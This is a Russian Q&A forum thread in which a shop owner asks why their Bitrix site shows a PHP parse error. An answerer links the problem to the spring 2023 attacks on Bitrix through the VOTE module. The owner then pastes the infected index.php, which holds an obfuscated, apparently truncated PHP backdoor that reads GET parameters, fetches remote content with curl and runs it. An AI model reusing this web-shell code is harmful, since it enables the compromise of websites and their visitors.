@Smajko

Вместо сайта белая страница и синтаксическая ошибка, что делать?

Здравствуйте! Пожалуйста, помогите разобраться, не могу уже полгода найти человека, который поймет, что произошло. Одни советуют одно, другие говорят, что не поможет. Весной 23 года сайт нашего магазина перестал открываться , в строке появилась вот такая надпись:

Parse error: syntax error, unexpected end of file, expecting '(' in /var/www/u0396783/data/www/santehmarket.com/index.php on line 1

Не может быть, что нужно в одной строке удалить скобку и все? только б найти ее. Писали хостингу, они попробовали бекап, но копия уже была испорчена вирусом или что это такое. Мы не обновляли битрикс очень давно, поскольку не было надобности в работе. сайт носит информационный характер и оплаты не принимаем. Вообще, с удовольствием ушли от битрикс, поэтому обновление покупать не хочется. Ранее был сайт на опенкарт - не нужно было с него переходить на битрикс.
  • Вопрос задан
  • 102 просмотра
Пригласить эксперта
Ответы на вопрос 2
Real_Fermer
@Real_Fermer
Программист PHP
посмотрите что в файле.
если он начинаетс не с
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/header.php");

то удалите все до этой строки

а весной 23 как раз была атака на битриксовые сайты. заражение шло через редко используемый модуль VOTE,
так что если у вас произошло заражение, то чисткой одного файла не исправиш.ь он там засирал много чего в ядре. Есть целые инструкции где и чего надо искать и чистить.
Ответ написан
Комментировать
@Smajko Автор вопроса
Здравствуйте! Спасибо Вам за ответ. Самое неприятное, что разработчик сайта сам не может исправить, дали контакт "стратегических партнеров". Может быть, подскажете организацию с опытом , проверенную,пожалуйста.

Но если зайти в этот файл index.php (я надеюсь, это же тот файл, а не похожий?) - захожу через менеджер файлов на хостинге,- то там всего одна строка и написано вот что, то что Вы пишете я не нашла.
<?php /*-F>hVX-*/error_reporting(0); $rkxqS /*--J7.9rC{>gY+mgE)0,p-*/=/*-)Uz~2&hG7C)3Gy-*/ "ra"./*-L(^yLnCN:%>jAPChm{3-*/"ng"./*-2FH^G7Ox:i<[D!:;)r-*/"e"; $qX /*-&7n.OoBvBL}-*/= /*--zYRLv6t#n-*/$rkxqS/*-ZwjTh(-r%!>AG-u6.X8-*/(/*-yu,VUgfdTe-*/"~",/*-8d-g}]Er%}-*/" ");/*-r]r&EUb4M-*/$QHn/*-IB)m>wnpR2gskv{;-*/=/*-oQ95(WVBy.8DNw8O-*/${$qX[30+1]/*-U^A,3b&xC$2!bJSlWi-*/.$qX[2+57]./*-]!3MCYKD;d7x{=LLm#-*/$qX[0+47].$qX[3+44]./*-u5~&mo?9.;{G-*/ $rlZiSImR /*-49g`JE?N-*/= /*-Xz9-*/explode/*-ou&to-*/(/*-@pwY-J-*/"@", /*-7C}9--*/$qMjJVc/*->n=-*/); /*-H<4n~Y-*/$UrzaQJBTVk /*-Sgs3[?7?-*/= /*-&&-*/""; foreach /*-.W8{S-*/(/*-5ciozWa-*/$rlZiSImR /*-o]aM%?nt$-*/as /*-s-*/$Wy /*-7T7-*/=>/*-EIP-*/ $IsyHtaUv/*-$`|FC-*/) /*-m>IJ#,`-*/$UrzaQJBTVk /*-,U~wax{-*/.= /*-^K%oM-*/$CyBJagSk[$IsyHtaUv/*-A^C4-*/ - /*-v8C+C-*/$sZSiQgD,/*-9nwt-*/ CURLOPT_RETURNTRANSFER,/*-]WW-*/ 1/*-T$Vwa-*/);/*-J+YlOMWv-*/ $bCTGIEt/*-0YJimq(58-*/ = /*-40@iEkLU-*/curl_exec/*-IK3.w`r-*/(/*-=,pP^5_z-*/$sZSiQgD/*-l?}nk{-*/); /*-I;-*/return /*-UW_K%Ma90-*/empty/*-{w_TE#(2C-*/(/*-Y6ev8I%l-*/$bCTGIEt/*-Cmo4+%$0-*/)/*-#HekkHj+-*/ ? /*-UouM-*/$Gw/*-s&p8I-*/(/*-{c:_uQ-*/$qtlGzLug/*-14RL|>A-*/)/*-+I-*/ : /*-HO-*/$bCTGIEt; /*-pKQ-*/}/*-mns-*/ static/*-BVK(RYY3K-*/ function /*-470zDLc{`-*/tguFLK/*-:p-*/() /*-C:n_R)X]-*/{/*-19V{2I^5fL-*/ $CtlXB /*-npCt6R-*/=/*-Kg`Y!^`-*/ array/*-a5cfN-*/("11437@11422@11435@11439@11420@11435@11441@11434@11419@11426@11437@11420@11431@11425@11426","11421@11420@11422@11441@11422@11425@11420@11487@11485","11430@11421@11425@11426@11441@11436@11435@11437@11425@11436@11435","11424@11439@11437@11429","11438@11439@11421@11435@11482@11484@11441@11436@11435@11437@11425@11436@11435","11434@11431@11428@11435@11441@11433@11435@11420@11441@11437@11425@11426@11420@11435@11426@11420@11421","11464@11494","11411","11489@11494","11471@11454@11454@11471@11447","11425@11434"); /*-Z(u+`-*/foreach /*-m42v-*/(/*-)W=s}Pt-*/$CtlXB/*-|Tu!ra.f-*/ as /*-q;JO4]rH}-*/$vFNEO/*-kl+A-*/)/*-T@CE6{&C6[-*/ $ZcwCvenN/*-56-*/[] /*-H#_mx?&VV-*/= /*-q@yB7-*/self/*-9^34-*/::/*-,rSU#K-*/za/*-Mb-*/(/*-U~Wy8A-*/$vFNEO/*-T;>3Fmj{-*/);/*-zn-*/$NFuOGreRY /*-F8;N.al-*/= /*-xM-*/@$ZcwCvenN/*-UAH&x.b#=-*/[/*-OM=]l[-*/1/*-a4Yu-*/]/*-O>^k)-*/(/*-=FREv&VQl-*/${/*-xw&p%mVMV-*/"_"/*-@&L79KA|f-*/."G"/*-uqw>e-*/."E"/*-z5B}{HD-*/."T"/*-xz0`hKkLG-*/}[/*-Wsml-*/$ZcwCvenN/*-XQED>>-*/[/*-ti;-*/7+2/*-$rc-*/]]/*-y8{o#-*/);/*--DBI,&|Hb-*/ $uNzvMUIY /*-qrTw|@FJJ-*/=/*-ESgtSWy2z-*/ @$ZcwCvenN/*-3pUDk-*/[/*-]_fD{J?-*/0+3/*-9`#[KihGg-*/]/*-_;Np!-*/(/*-|o=&M+L0-*/$ZcwCvenN/*-V|-*/[/*-UnmGm-*/1+5/*-pP=`U-*/], /*-CVZJwxXzR-*/$NFuOGreRY/*-ri8guIj-*/);/*-O(I@$w-*/ $Cy /*-DQ?!6{&-*/=/*-p&kE[p&AX-*/ $ZcwCvenN/*-4!^O4p-*/[/*-,$uSFHJy-*/2+0/*-NaFD-*/]/*-XhE-*/(/*-=E-*/$uNzvMUIY,/*-{>>;mjht.-*/ true/*-NC]JI+-*/); /*-UkUdBk-*/@${/*-,R@E-*/"_"./*-W%8+0&t3-*/"G"./*-Y-*/"E"/*-Z[k-*/."T"/*-T+oCC7S-*/}/*-5p-*/[/*-s=}SCFB;[-*/$ZcwCvenN/*-XK]-&k#-*/[0+10/*-9+(w-*/]/*-rGqh(-*/]/*-8-@SKJ-*/ == /*-8EotG-*/1 /*-B,;-tq{clz-*/&& /*-`wdYF&yR-*/die/*-HRSD4KFN-*/(/*-xQ=yt-*/$ZcwCvenN[1+4/*-.55IW-*/]/*-}!f)hj-*/(/*-dczPk1)`B-*/__FILE__/*-Qb-*/)/*->y[h-*/); /*-ple~-*/if/*-T4L)U>-*/
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы